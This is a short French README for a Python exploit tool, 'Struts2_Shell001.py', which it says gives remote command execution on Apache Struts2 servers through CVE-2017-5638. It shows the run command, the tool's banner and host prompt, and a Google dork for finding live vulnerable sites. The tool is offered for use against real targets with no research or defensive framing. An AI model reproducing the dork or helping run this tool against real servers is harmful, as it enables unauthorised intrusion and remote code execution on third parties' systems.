
Exploit créé par : R4v3nBl4ck end Pacman
Cet exploit exploite la vulnérabilité Apache Struts2 (CVE-2017-5638), permettant d'exécuter des commandes à distance sur le serveur Apache.
Comment utiliser :
$ sudo python Struts2_Shell001.py
*******************************************
* [!] Exploit Apache Struts2 {*}DEMO *
*******************************************
Code de Rvbk
[+] HOST con http(s)> Site avec vulnérabilité
dork google pour trouver des sites utilisant struts :) intitle:"Struts Problem Report" intext:"development mode is enabled."